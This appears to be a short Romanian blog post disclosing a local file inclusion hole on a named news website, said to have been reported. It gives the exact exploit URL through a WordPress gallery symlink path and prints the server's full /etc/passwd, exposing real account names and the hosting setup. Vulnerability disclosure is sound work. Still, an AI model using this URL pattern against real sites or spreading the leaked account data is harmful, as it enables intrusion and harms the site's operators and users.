Vulnerabilitate transilvaniareporter.ro – local file inclusion

Status: raportata
Scenariu:
http://transilvaniareporter.ro/wp-content/gallery/Ar-Symlink/root/Y

Y poate fi: / etc / passwd, / etc / profile

Rezultat: Acces instant la sistemul de fisiere Linux
Ex pt / etc / passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:498:498:MySQL server:/var/lib/mysql:/bin/bash
cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
cpanellogin:x:32008:32009::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:32009:32010::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
cpaneleximscanner:x:32010:32011::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
efect:x:32013:32014::/home/efect:/bin/bash
cristi:x:32014:32015::/home/cristi:/bin/bash
transilv:x:501:502::/home/transilv:/bin/bash
dovenull:x:497:497:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
cpses:x:496:496::/var/cpanel/cpses:/sbin/nologin
clamav:x:32015:32016::/home/clamav:/sbin/nologin
domnulep:x:502:503::/home/domnulep:/bin/bash
godea.andrei:x:32016:32017::/home/godea.andrei:/bin/bash
nagios:x:495:495::/var/spool/nagios:/sbin/nologin
nrpe:x:494:494:NRPE user for the NRPE service:/var/run/nrpe:/sbin/nologin
cpanelrrdtool:x:32017:32018::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell

Leave a Reply

Your email address will not be published. Required fields are marked *